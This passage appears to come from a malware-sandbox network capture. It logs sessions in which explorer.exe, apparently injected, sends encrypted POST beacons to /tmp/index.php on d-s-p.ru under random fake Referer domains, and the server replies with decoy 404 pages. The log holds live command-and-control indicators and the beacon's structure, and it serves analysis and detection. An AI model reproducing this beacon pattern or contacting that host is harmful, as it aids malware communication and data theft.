                                                                                                                                                                                Dec 30, 2024 19:43:15.059684038 CET339OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 46 1b d5 f0
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vuF&YvMwe6Ct~dZR=uDd%6R&<#4"e.Mjqr_R%=*U3B_r^AF%NmsoT-
                                                                                                                                                                                Dec 30, 2024 19:43:16.521765947 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:43:16 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                28192.168.2.44990158.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:43:16.600547075 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://abtqqggxsfhktnpg.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 333
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:43:16.600569963 CET333OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 57 5d d2 88
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vuW]hTXQxc-K!`;:}*P&'QUn"Z5IF_5t`WVKE*!ZE3cyGjl{k)oOPs
                                                                                                                                                                                Dec 30, 2024 19:43:18.168605089 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:43:17 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                29192.168.2.44991258.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:43:18.178934097 CET277OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://wluclgmelcx.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 345
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:43:18.178970098 CET345OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 2a 5f b7 9b
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vu*_ypkP#HjOy99eJ$)Hj3N)bKU~-Q\`''E+DzUe&~G`Ui$)C
                                                                                                                                                                                Dec 30, 2024 19:43:19.668881893 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:43:19 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                30192.168.2.44992358.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:43:19.677304983 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://cskorkkrkwytkhtu.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 204
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:43:19.677333117 CET204OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 5c 2c bd aa
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vu\,ul2J]<Vm0Ui{dB OM'Nt^$4~8W{&]Q7x1
                                                                                                                                                                                Dec 30, 2024 19:43:21.135529041 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:43:20 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                31192.168.2.44993158.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:43:21.144504070 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://fghaoijaskpcuqs.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 186
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:43:21.144526005 CET186OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 58 0a ae bf
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vuX?eu1^</qh@=| JVs9]\S}K*h"H4<kKtF
                                                                                                                                                                                Dec 30, 2024 19:43:22.603473902 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:43:22 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                32192.168.2.44994158.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:43:22.615523100 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://ufwlknyimcdyhhff.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 320
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:43:22.615537882 CET320OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 65 31 e6 a8
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[k,vue1gET\?'_A=;~Gi#aX1Y5p<LO;$F2+o<yYB">kwQ$f]lNLCIviK#-k
                                                                                                                                                                                Dec 30, 2024 19:43:24.081443071 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:43:23 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                33192.168.2.44995158.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:43:24.130783081 CET277OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://jessdujhjjx.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:43:24.130805016 CET142OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 44 2c b9 9f
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[*k,vuD,]qypwj|%>tY"ibvi)5:0QT
                                                                                                                                                                                Dec 30, 2024 19:43:25.585412025 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:43:25 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 63 42 f3 31 04 ed f1 49 f6 9d ed e4 21 9b 23 9a e8 31 55 12 c3 89 9b c2 63 9a 3b 0d 16
                                                                                                                                                                                Data Ascii: #\6cB1I!#1Uc;


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                34192.168.2.45004058.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:44:53.713500023 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://hsmioefmqryctki.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 307
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:44:53.713531017 CET307OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 58 30 bd f1
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[+k,vuX0pF(8w, ` 4{AtX~S2Z*E05'i4N+aH >(YEtO)^Q[4su($YyD!h(1
                                                                                                                                                                                Dec 30, 2024 19:44:55.486449957 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:44:54 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Dec 30, 2024 19:44:55.486623049 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:44:54 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                35192.168.2.45004158.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:44:55.544118881 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://mmcpyibdxwiwlos.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 240
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:44:55.544131994 CET240OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 28 6b 2c 90 f5 76 0b 75 3a 34 bb ea
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[(k,vu:4g^PHtPD@?9ralH?)./.q,?.%F]BlY62]Vf~vDig^&h,
                                                                                                                                                                                Dec 30, 2024 19:44:57.052090883 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:44:56 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                36192.168.2.45004258.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:44:57.091011047 CET278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://bqqqwcluixvv.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 313
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:44:57.091022015 CET313OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 29 6b 2c 90 f5 76 0b 75 5a 29 eb fb
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[)k,vuZ)lh~x?M+L8gk@u)^>2V0]\.'b}uUI6!v~1'WRh-`.?f]o.2]#
                                                                                                                                                                                Dec 30, 2024 19:44:58.529026031 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:44:58 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
